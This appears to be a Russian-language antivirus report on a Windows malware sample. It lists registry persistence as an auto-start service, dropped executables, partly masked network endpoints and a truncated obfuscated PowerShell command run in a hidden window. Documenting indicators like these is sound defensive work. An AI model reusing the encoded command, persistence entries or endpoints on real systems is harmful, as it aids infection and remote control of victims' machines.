Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\KBDHELA3] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\KBDHELA3] 'ImagePath' = '"%WINDIR%\SysWOW64\msi\KBDHELA3.exe"'
- 'KBDHELA3' "%WINDIR%\SysWOW64\msi\KBDHELA3.exe"
- 'KBDHELA3' %WINDIR%\SysWOW64\msi\KBDHELA3.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABaAHgAdQA3AG0AegA5AD0AKAAoACcATwB2ACcAKwAnAHIAXwAnACkAKwAoACcAXwAnACsAJwB4ADkAJwApACkAOwAmACgAJwBuAGUAdwAtACcAKwAnAGkAdABlAG0AJwApACAAJABFAE4AdgA6AFUAUwBlAHIAUAByAG8AZgBpAGwAZQBcAFAAbwBoA...
- %HOMEPATH%\poho327\tuq_bwi\ojqot28t.exe
- %WINDIR%\syswow64\msi\kbdhela3.exe
- %HOMEPATH%\poho327\tuq_bwi\ojqot28t.exe в %WINDIR%\syswow64\msi\kbdhela3.exe
- '24.##.32.186':80
- http://or##ks.com/system/cache/MF1h/
- http://24.##.32.186/mGIRRxLsaaolgfe/hhFfhIjDebyT/
- DNS ASK or##ks.com
- '%HOMEPATH%\poho327\tuq_bwi\ojqot28t.exe'
- '%WINDIR%\syswow64\msi\kbdhela3.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABaAHgAdQA3AG0AegA5AD0AKAAoACcATwB2ACcAKwAnAHIAXwAnACkAKwAoACcAXwAnACsAJwB4ADkAJwApACkAOwAmACgAJwBuAGUAdwAtACcAKwAnAGkAdABlAG0AJwApACAAJABFAE4AdgA6AFUAUwBlAHIAUAByAG8AZgBpAGwAZQBcAFAAbwBoA...' (со скрытым окном)